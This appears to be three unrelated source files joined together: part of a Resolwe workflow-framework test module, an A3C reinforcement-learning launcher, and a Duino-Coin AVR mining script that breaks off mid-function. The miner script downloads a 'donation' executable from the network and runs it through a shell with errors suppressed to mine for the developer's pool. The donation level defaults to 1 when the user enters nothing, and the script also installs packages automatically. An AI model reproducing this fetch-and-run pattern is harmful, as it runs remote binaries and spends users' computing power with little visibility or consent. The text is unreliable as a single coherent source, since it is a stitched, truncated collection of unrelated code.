apps_mock.get_app_configs.return_value = [
mock.MagicMock(path="/resolwe/test_app1"),
mock.MagicMock(path="/resolwe/test_app2"),
]
os_mock.path.join = os.path.join
os_mock.path.isdir.side_effect = [False, True]
settings_mock.RESOLWE_CUSTOM_TOOLS_PATHS = ["/custom_tools"]
base_executor = BaseFlowExecutorPreparer()
tools_list = base_executor.get_tools_paths()
self.assertEqual(len(tools_list), 2)
self.assertIn("/resolwe/test_app2/tools", tools_list)
self.assertIn("/custom_tools", tools_list)
@mock.patch("resolwe.flow.utils.apps")
@mock.patch("resolwe.flow.utils.settings")
def test_not_list(self, settings_mock, apps_mock):
apps_mock.get_app_configs.return_value = []
settings_mock.RESOLWE_CUSTOM_TOOLS_PATHS = "/custom_tools"
base_executor = BaseFlowExecutorPreparer()
with self.assertRaisesRegex(KeyError, "setting must be a list"):
base_executor.get_tools_paths()
class ManagerRunProcessTest(ProcessTestCase):
def setUp(self):
super().setUp()
self._register_schemas(
processes_paths=[PROCESSES_DIR], descriptors_paths=[DESCRIPTORS_DIR]
)
@tag_process("test-min")
def test_minimal_process(self):
self.run_process("test-min")
@tag_process("test-annotate")
def test_annotate(self):
data = self.run_process("test-annotate")
self.assertIsNotNone(data.entity)
dsc = data.entity.descriptor
self.assertIn("general", dsc)
self.assertIn("species", dsc["general"])
self.assertEqual(dsc["general"]["species"], "Valid")
@tag_process("test-annotate-wrong-option")
def test_annotate_wrong_option(self):
data = self.run_process(
"test-annotate-wrong-option", assert_status=Data.STATUS_ERROR
)
self.assertEqual(len(data.process_error), 1)
self.assertIn("must match one of predefined choices", data.process_error[0])
@tag_process("test-annotate-wrong-type")
def test_annotate_wrong_type(self):
data = self.run_process(
"test-annotate-wrong-type", assert_status=Data.STATUS_ERROR
)
self.assertEqual(len(data.process_error), 1)
self.assertIn("not valid under any of the given schemas", data.process_error[0])
@tag_process("test-annotate-missing-field")
def test_annotate_missing_field(self):
data = self.run_process(
"test-annotate-missing-field", assert_status=Data.STATUS_ERROR
)
self.assertEqual(len(data.process_error), 1)
self.assertIn("definition (invalid) missing in schema", data.process_error[0])
@tag_process("test-annotate-no-entity")
def test_annotate_no_entity(self):
data = self.run_process(
"test-annotate-no-entity", assert_status=Data.STATUS_ERROR
)
self.assertEqual(len(data.process_error), 1)
self.assertIn("No entity to annotate", data.process_error[0])
@tag_process("test-missing-file")
def test_missing_file(self):
self.run_process("test-missing-file", assert_status=Data.STATUS_ERROR)
data = Data.objects.last()
self.assertEqual(data.status, Data.STATUS_ERROR)
self.assertEqual(len(data.process_error), 1)
self.assertIn(
"Output 'output' set to a missing file: 'i-dont-exist.zip'.",
data.process_error[0],
)
@tag_process("test-spawn-new")
def test_spawn(self):
self.run_process("test-spawn-new", tags=["test-tag"])
data = Data.objects.last()
file_path = data.location.get_path(filename="foo.bar")
self.assertEqual(data.output["saved_file"]["file"], "foo.bar")
self.assertTrue(os.path.isfile(file_path))
self.assertEqual(data.tags, ["test-tag"])
parent_data = Data.objects.first()
self.assertEqual(data.parents.count(), 1)
self.assertEqual(data.parents.first(), parent_data)
# Check correct dependency type is created.
self.assertEqual(
{d.kind for d in data.parents_dependency.all()},
{DataDependency.KIND_SUBPROCESS},
)
@tag_process("test-spawn-missing-file")
def test_spawn_missing_export(self):
data = self.run_process(
"test-spawn-missing-file", assert_status=Data.STATUS_ERROR
)
self.assertIn(
"Error while preparing spawned Data objects", data.process_error[0]
)
@tag_process(
"test-broken",
"test-broken-invalid-execution-engine",
"test-broken-invalid-expression-engine",
"test-broken-data-name",
)
def test_broken(self):
Process.objects.create(
slug="test-broken-invalid-execution-engine",
name="Test Process",
contributor=self.contributor,
type="data:test",
version=1,
run={
"language": "invalid",
},
)
self.run_process("test-broken", assert_status=Data.STATUS_ERROR)
self.run_process(
"test-broken-invalid-expression-engine", assert_status=Data.STATUS_ERROR
)
self.run_process(
"test-broken-invalid-execution-engine", assert_status=Data.STATUS_ERROR
)
# If evaluation of data_name template fails, the process should not abort as the
# template may be evaluatable later when the process completes.
self.run_process("test-broken-data-name")
@tag_process("test-broken-invalide-storage")
def test_invalid_storage_file(self):
data = self.run_process(
"test-broken-invalide-storage", assert_status=Data.STATUS_ERROR
)
self.assertEqual(data.status, Data.STATUS_ERROR)
print("ERROR", data.process_error[0])
self.assertIn("must be a valid JSON, current: 1a", data.process_error[0])
@tag_process("test-workflow-1")
def test_workflow(self):
assign_perm("view_collection", self.contributor, self.collection)
assign_perm("view_collection", self.group, self.collection)
workflow_data = self.run_process(
"test-workflow-1", {"param1": "world"}, tags=["test-tag"]
)
workflow_data.refresh_from_db()
step1_data = Data.objects.get(process__slug="test-example-1")
step2_data = Data.objects.get(process__slug="test-example-2")
# Workflow should output indices of all data objects, in order.
self.assertEqual(workflow_data.output["steps"], [step1_data.pk, step2_data.pk])
# Steps should execute with the correct variables.
self.assertEqual(step1_data.input["param1"], "world")
self.assertEqual(step1_data.input["param2"], True)
self.assertEqual(step1_data.output["out1"], "hello world")
self.assertEqual(step1_data.tags, ["test-tag"])
self.assertEqual(step2_data.input["param1"], step1_data.pk)
self.assertEqual(step2_data.input["param2"]["a"], step1_data.pk)
self.assertEqual(step2_data.input["param2"]["b"], "hello")
self.assertEqual(step2_data.output["out1"], "simon says: hello world")
self.assertEqual(step2_data.tags, ["test-tag"])
self.assertEqual(step1_data.parents.count(), 1)
self.assertEqual(step1_data.parents.first(), workflow_data)
self.assertEqual(step2_data.parents.count(), 2)
self.assertCountEqual(step2_data.parents.all(), [workflow_data, step1_data])
# Check correct dependency type is created.
self.assertEqual(
{d.kind for d in step1_data.parents_dependency.all()},
{DataDependency.KIND_SUBPROCESS},
)
self.assertEqual(
{d.kind for d in step2_data.parents_dependency.all()},
{DataDependency.KIND_SUBPROCESS, DataDependency.KIND_IO},
)
self.assertTrue(self.contributor.has_perm("flow.view_data", step1_data))
# User inherites permission from group
self.assertTrue(self.user.has_perm("flow.view_data", step1_data))
@tag_process("test-workflow-2")
def test_workflow_entity(self):
with self.preparation_stage():
# `self.run_process` adds input data in self.collection
input_data = self.run_process("test-example-3")
workflow = self.run_process("test-workflow-2", {"data1": input_data.pk})
# Check that workflow results are added to the collection.
self.assertEqual(
self.collection.data.filter(pk__in=workflow.output["steps"]).count(), 1
)
# self.collection now contains workflow and two "normal" data objects
self.assertEqual(self.collection.data.all().count(), 3)
@unittest.skipIf(
os.environ.get("GITHUB_ACTIONS", "") == "true", "Fails on Github Actions"
)
@with_docker_executor
@tag_process("test-docker")
def test_run_in_docker(self):
data = self.run_process("test-docker")
self.assertEqual(data.output["result"], "OK")
@with_docker_executor
@disable_auto_calls()
def test_terminate_worker(self):
process = Process.objects.get(slug="test-terminate")
data = Data.objects.create(
name="Test data",
contributor=self.contributor,
process=process,
)
def start_processing(data):
async_to_sync(manager.communicate)(data_id=data.pk, run_sync=True)
processing_thread = threading.Thread(target=start_processing, args=(data,))
processing_thread.start()
# Wait for up to 5s for process to start.
for _ in range(50):
sleep(0.1)
data.refresh_from_db()
with suppress(Data.worker.RelatedObjectDoesNotExist):
if data.worker.status == Worker.STATUS_PROCESSING:
break
self.assertEqual(data.worker.status, Worker.STATUS_PROCESSING)
data.worker.terminate()
# Give it max 10 seconds to terminate.
for _ in range(100):
sleep(0.1)
data.refresh_from_db()
if data.worker.status == Worker.STATUS_COMPLETED:
break
self.assertEqual(data.worker.status, Worker.STATUS_COMPLETED)
self.assertEqual(data.status, Data.STATUS_ERROR)
self.assertEqual(data.process_error[0], "Processing was cancelled.")
processing_thread.join(timeout=10)
self.assertFalse(processing_thread.is_alive())
@with_docker_executor
@tag_process("test-requirements-docker")
def test_executor_requirements(self):
data = self.run_process("test-requirements-docker")
self.assertEqual(data.output["result"], "OK")
@with_docker_executor
@tag_process("test-docker-uid-gid")
def test_docker_uid_gid(self):
data = self.run_process("test-docker-uid-gid")
self.assertEqual(data.output["result"], "OK")
@unittest.skip("Null executor test currently not working.")
@with_null_executor
@tag_process("test-save-number")
def test_null_executor(self):
data = self.run_process(
"test-save-number", {"number": 19}, assert_status=Data.STATUS_WAITING
)
self.assertEqual(data.input["number"], 19)
self.assertEqual(data.output, {})
@unittest.skipIf(
os.environ.get("GITHUB_ACTIONS", "") == "true", "Fails on Github Actions"
)
@with_docker_executor
@tag_process("test-memory-resource-alloc", "test-memory-resource-noalloc")
def test_memory_resource(self):
# This process should be terminated due to too much memory usage.
self.run_process("test-memory-resource-alloc", assert_status=Data.STATUS_ERROR)
# This process should run normally (honors the limits).
self.run_process("test-memory-resource-noalloc")
@with_docker_executor
@tag_process("test-cpu-resource-1core", "test-cpu-resource-2core")
def test_cpu_resource(self):
# Currently there is no good way to test this reliably, so we just check if the
# resource limit specification still makes the process run.
self.run_process("test-cpu-resource-1core")
self.run_process("test-cpu-resource-2core")
@unittest.skipIf(
settings.FLOW_DOCKER_DISABLE_SECCOMP, "Docker seccomp is disabled."
)
@with_docker_executor
@tag_process(
"test-network-resource-enabled",
"test-network-resource-disabled",
"test-network-resource-policy",
)
def test_network_resource(self):
self.run_process("test-network-resource-enabled")
self.run_process(
"test-network-resource-disabled", assert_status=Data.STATUS_ERROR
)
self.run_process(
"test-network-resource-policy", assert_status=Data.STATUS_ERROR
)
@with_docker_executor
@override_settings(FLOW_PROCESS_RESOURCE_DEFAULTS={"cpu_time_interactive": 1})
@tag_process(
"test-scheduling-class-interactive-ok",
"test-scheduling-class-interactive-fail",
"test-scheduling-class-batch",
)
def test_scheduling_class(self):
self.run_process("test-scheduling-class-interactive-ok")
self.run_process(
"test-scheduling-class-interactive-fail", assert_status=Data.STATUS_ERROR
)
self.run_process("test-scheduling-class-batch")
@with_docker_executor
@tag_process("test-save-number")
def test_executor_fs_lock(self):
# First, run the process normaly.
data = self.run_process("test-save-number", {"number": 42})
# Make sure that process was successfully ran first time.
self.assertEqual(data.output["number"], 42)
data.output = {}
data.save()
file = Path(data.location.get_path(filename="temporary_file_do_not_purge.txt"))
self.assertFalse(file.exists())
file.touch()
process = subprocess.run(
["python", "-m", "executors", ".docker"],
cwd=data.get_runtime_path(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
timeout=10,
)
self.assertEqual(process.returncode, 0)
data.refresh_from_db()
self.assertEqual(data.output, {})
self.assertEqual(data.status, Data.STATUS_DONE)
self.assertEqual(data.process_error, [])
# Check that temporary file was not deleted.
self.assertTrue(file.exists())
|
main.py | from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import gym
import my_optim
from model import ActorCritic
from test import test
from train import train
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99,
help='discount factor for rewards (default: 0.99)')
parser.add_argument('--gae-lambda', type=float, default=1.00,
help='lambda parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
help='value loss coefficient (default: 0.5)')
parser.add_argument('--max-grad-norm', type=float, default=50,
help='value loss coefficient (default: 50)')
parser.add_argument('--seed', type=int, default=1,
help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20,
help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
help='environment to train on (default: PongDeterministic-v4)') #
parser.add_argument('--no-shared', default=False,
help='use an optimizer without shared momentum.')
if __name__ == '__main__':
os.environ['OMP_NUM_THREADS'] = '1'
os.environ['CUDA_VISIBLE_DEVICES'] = ""
args = parser.parse_args()
torch.manual_seed(args.seed)
env = gym.make(args.env_name)
shared_model = ActorCritic(
env.observation_space.shape[2], env.action_space)
shared_model.share_memory()
if args.no_shared:
optimizer = None
else:
optimizer = my_optim.SharedAdam(shared_model.parameters(), lr=args.lr)
optimizer.share_memory()
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
p = mp.Process(target=test, args=(args.num_processes, args, shared_model, counter))
p.start()
processes.append(p)
for rank in range(0, args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_model, counter, lock, optimizer))
p.start()
processes.append(p)
for p in processes:
p.join()
|
AVR_Miner.py | #!/usr/bin/env python3
##########################################
# Duino-Coin Python AVR Miner (v2.5.1)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import processor as osprocessor
from pathlib import Path
from platform import system
from re import sub
from signal import SIGINT, signal
from socket import socket
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread as thrThread
from threading import Lock
from time import ctime, sleep, strptime, time
from statistics import mean
import pip
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
def now():
# Return datetime object
return datetime.now()
try:
# Check if pyserial is installed
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pyserial is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pyserial" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pyserial')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Colorama is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "colorama" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('colorama')
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Pypresence is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pypresence" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('pypresence')
# Global variables
MINER_VER = '2.51' # Version number
SOC_TIMEOUT = 60
AVR_TIMEOUT = 4 # diff 8(*100) / 196 H/s ~= 4
BAUDRATE = 115200
RESOURCES_DIR = 'AVRMiner_' + str(MINER_VER) + '_resources'
shares = [0, 0]
hashrate_mean = []
diff = 0
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
# Serverip file
server_ip_file = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/gh-pages/serverip.txt')
donation_level = 0
hashrate = 0
config = ConfigParser()
thread_lock = Lock()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + '/langs.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(RESOURCES_DIR + '/langs.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + '/langs.json', 'r', encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + '/Miner_config.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('pt'):
lang = 'portugese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
else:
lang = 'english'
else:
try:
# Read language from configfile
config.read(RESOURCES_DIR + '/Miner_config.cfg')
lang = config['Duino-Coin-AVR-Miner']['language']
except Exception:
# If it fails, fallback to english
lang = 'english'
except:
lang = 'english'
def get_string(string_name):
# Get string from language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return 'String not found: ' + string_name
def debug_output(text):
# Debug output
if debug == 'y':
print(
Style.RESET_ALL
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ 'DEBUG: '
+ str(text))
def title(title):
# Window title
if osname == 'nt':
# Windows systems
ossystem('title ' + title)
else:
# Most standard terminals
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def connect():
# Server connection
global server_ip
global server_port
serverVersion = 0
while True:
try:
try:
socket.close()
except Exception:
pass
debug_output('Connecting to '
+ str(server_ip)
+ str(':')
+ str(server_port))
soc = socket()
soc.settimeout(SOC_TIMEOUT)
# Establish socket connection to the server
soc.connect(
(str(server_ip),
int(server_port)))
# Get server version
serverVersion = soc.recv(10).decode().rstrip('\n')
debug_output('Server version: ' + serverVersion)
if float(serverVersion) <= float(MINER_VER):
# If miner is up-to-date, display a message and continue
pretty_print(
'net0',
get_string('connected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('connected_server')
+ str(serverVersion)
+ ')',
'success')
break
else:
pretty_print(
'sys0',
' Miner is outdated (v'
+ MINER_VER
+ ') -'
+ get_string('server_is_on_version')
+ serverVersion
+ Style.NORMAL
+ Fore.RESET
+ get_string('update_warning'),
'warning')
sleep(10)
break
except Exception as e:
pretty_print(
'net0',
get_string('connecting_error')
+ Style.NORMAL
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Connection error: ' + str(e))
sleep(10)
return soc
def handler(signal_received, frame):
# SIGINT handler
pretty_print(
'sys0',
get_string('sigint_detected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('goodbye'),
'warning')
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
# Config loading section
global username
global donation_level
global avrport
global debug
global rig_identifier
# Initial configuration section
if not Path(str(RESOURCES_DIR) + '/Miner_config.cfg').is_file():
print(
Style.BRIGHT
+ get_string('basic_config_tool')
+ RESOURCES_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL
+ get_string('dont_have_account')
+ Fore.YELLOW
+ get_string('wallet')
+ Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET
+ Style.BRIGHT)
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ ' '
+ str(port))
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET
+ Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET
+ Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL
+ Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET
+ Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET
+ Style.BRIGHT)
# Check wheter donation_level is correct
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
# Format data
config['Duino-Coin-AVR-Miner'] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 60,
"avr_timeout": 4,
"discord_presence": "y"}
# Write data to file
with open(str(RESOURCES_DIR)
+ '/Miner_config.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
else: # If config already exists, load from it
config.read(str(RESOURCES_DIR) + '/Miner_config.cfg')
username = config['Duino-Coin-AVR-Miner']['username']
avrport = config['Duino-Coin-AVR-Miner']['avrport']
avrport = avrport.replace(" ", "").split(',')
donation_level = config['Duino-Coin-AVR-Miner']['donate']
debug = config['Duino-Coin-AVR-Miner']['debug']
rig_identifier = config['Duino-Coin-AVR-Miner']['identifier']
SOC_TIMEOUT = config["Duino-Coin-AVR-Miner"]["soc_timeout"]
AVR_TIMEOUT = config["Duino-Coin-AVR-Miner"]["soc_timeout"]
discord_presence = config["Duino-Coin-AVR-Miner"]["discord_presence"]
def greeting():
# greeting message depending on time
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string('greeting_morning')
elif current_hour == 12:
greeting = get_string('greeting_noon')
elif current_hour > 12 and current_hour < 18:
greeting = get_string('greeting_afternoon')
elif current_hour >= 18:
greeting = get_string('greeting_evening')
else:
greeting = get_string('greeting_back')
# Startup message
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Fore.YELLOW
+ Style.BRIGHT
+ get_string('banner')
+ Style.RESET_ALL
+ Fore.MAGENTA
+ ' (v'
+ str(MINER_VER)
+ ') '
+ Fore.RESET
+ '2019-2021')
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.MAGENTA
+ 'https://github.com/revoxhere/duino-coin')
if lang != "english":
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.MAGENTA
+ get_string("translation_autor"))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('avr_on_port')
+ Style.BRIGHT
+ Fore.YELLOW
+ ' '.join(avrport))
if osname == 'nt' or osname == 'posix':
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('donation_level')
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('algorithm')
+ Style.BRIGHT
+ Fore.YELLOW
+ 'DUCO-S1A @ AVR diff')
if rig_identifier != "None":
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ get_string('rig_identifier')
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identifier)
print(
Style.DIM
+ Fore.MAGENTA
+ ' ‖ '
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ', '
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ '!\n')
if int(donation_level) > 0:
if osname == 'nt':
# Initial miner executable section
if not Path(RESOURCES_DIR + '/Donate_executable.exe').is_file():
url = ('https://github.com/'
+ 'revoxhere/'
+ 'duino-coin/blob/useful-tools/'
+ 'donateExecutableWindows.exe?raw=true')
r = requests.get(url)
with open(RESOURCES_DIR + '/Donate_executable.exe', 'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableAARCH64?raw=true")
else:
url = ("https://github.com/revoxhere/"
+ "duino-coin/blob/useful-tools/Donate_executables/"
+ "DonateExecutableLinux?raw=true")
if not Path(RESOURCES_DIR + "/Donate_executable").is_file():
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable", "wb") as f:
f.write(r.content)
def donate():
global donation_level
global donator_running
global donateExecutable
if osname == 'nt':
cmd = (
'cd '
+ RESOURCES_DIR
+ '& Donate_executable.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:7008 '
+ '-u revox.donate '
+ '-p x -s 4 -e ')
elif osname == 'posix':
cmd = (
'cd '
+ RESOURCES_DIR
+ '&& chmod +x Donate_executable '
+ '&& ./Donate_executable '
+ '-o stratum+tcp://xmg.minerclaim.net:7008 '
+ '-u revox.donate '
+ '-p x -s 4 -e ')
if int(donation_level) <= 0:
pretty_print(
'sys0',
Fore.YELLOW
+ get_string('free_network_warning')
+ get_string('donate_warning')
+ Fore.GREEN
+ 'https://duinocoin.com/donate'
+ Fore.YELLOW
+ get_string('learn_more_donate'),
'warning')
sleep(5)
elif donator_running == False:
if int(donation_level) == 5:
cmd += '50'
elif int(donation_level) == 4:
cmd += '40'
elif int(donation_level) == 3:
cmd += '30'
elif int(donation_level) == 2:
cmd += '20'
elif int(donation_level) == 1:
cmd += '10'
if int(donation_level) > 0:
debug_output(get_string('starting_donation'))
donator_running = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
pretty_print(
'sys0',
get_string('thanks_donation'),
'warning')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808056068113563701)
RPC.connect()
debug_output('Discord rich presence initialized')
except Exception:
# Discord not launched
pass
def update_rich_presence():
# Update rich presence status
startTime = int(time())
while True:
try:
RPC.update(
details='Hashrate: ' + str(hashrate) + ' H/s',
start=startTime,
state='Acc. shares: '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1]),
large_image='ducol',
large_text='Duino-Coin, '
+ 'a coin that can be mined with almost everything, '
+ 'including AVR boards',
buttons=[
{'label': 'Learn more',
'url': 'https://duinocoin.com'},
{'label': 'Discord Server',
'url': 'https://discord.gg/k48Ht5y'}])
except Exception:
# Discord not launched
pass
# 15 seconds to respect Discord's rate limit
sleep(15)
def pretty_print(message_type, message, state):
# Print output messages in the DUCO 'standard'
# Usb/net/sys background
if message_type.startswith('net'):
background = Back.BLUE
elif message_type.startswith('usb'):
background = Back.MAGENTA
else:
background = Back.GREEN
# Text color
if state == 'success':
color = Fore.GREEN
elif state == 'warning':
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ background
+ ' '
+ message_type
+ ' '
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def mine_avr(com):
# Mining section
global hashrate
global server_ip
global server_port
errorCounter = 0
while True:
# Grab server IP and port
while True:
try:
# Use request to grab data from raw github file
res = requests.get(server_ip_file, data=None)
if res.status_code == 200:
# Read content and split into lines
content = (res.content.decode().splitlines())
server_ip = content[0] # Line 1 = pool address
server_port = 2814 # content[1] # Line 2 = pool port
debug_output(
'Retrieved pool IP: '
+ server_ip
+ ':'
+ str(server_port))
# Connect to the server
soc = connect()
break
except Exception as e:
# If there was an error with grabbing data from GitHub
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('data_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (git err: '
+ str(e)
+ ')',
'error')
debug_output('GitHub error: ' + str(e))
sleep(10)
pretty_print(
'sys'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_start')
+ Style.NORMAL
+ Fore.RESET
+ get_string('mining_algorithm')
+ str(com)
+ ')',
'success')
while True:
while True:
try:
# Send job request
debug_output(com + ': requested job from the server')
soc.sendall(
bytes(
'JOB,'
+ str(username)
+ ',AVR',
encoding='utf8'))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(''.join(filter(str.isdigit, com)))
+ "Correct job received")
break
except:
pretty_print("usb"
+ str(''.join(filter(str.isdigit, com))),
" Server message: "
+ job[1],
"warning")
sleep(3)
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (net err: '
+ str(e)
+ ')',
'error')
debug_output('Connection error: ' + str(e))
sleep(5)
soc = connect()
while True:
while True:
try:
ser.close()
except:
pass
try:
ser = Serial(com,
baudrate=BAUDRATE,
timeout=AVR_TIMEOUT)
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ ' (port connection err: '
+ str(e)
+ ')',
'error')
sleep(10)
while True:
retry_counter = 0
while True:
if retry_counter >= 3:
break
try:
debug_output(com + ': sending job to AVR')
ser.write(
bytes(
str(
job[0]
+ ',' + job[1]
+ ',' + job[2]
+ ','), encoding='utf8'))
debug_output(com + ': reading result from AVR')
result = ser.read_until(b'\n').decode().strip()
ser.flush()
if "\x00" in result or not result:
raise Exception("Empty data received")
debug_output(com + ': retrieved result: '
+ str(result)
+ ' len: '
+ str(len(result)))
result = result.split(',')
try:
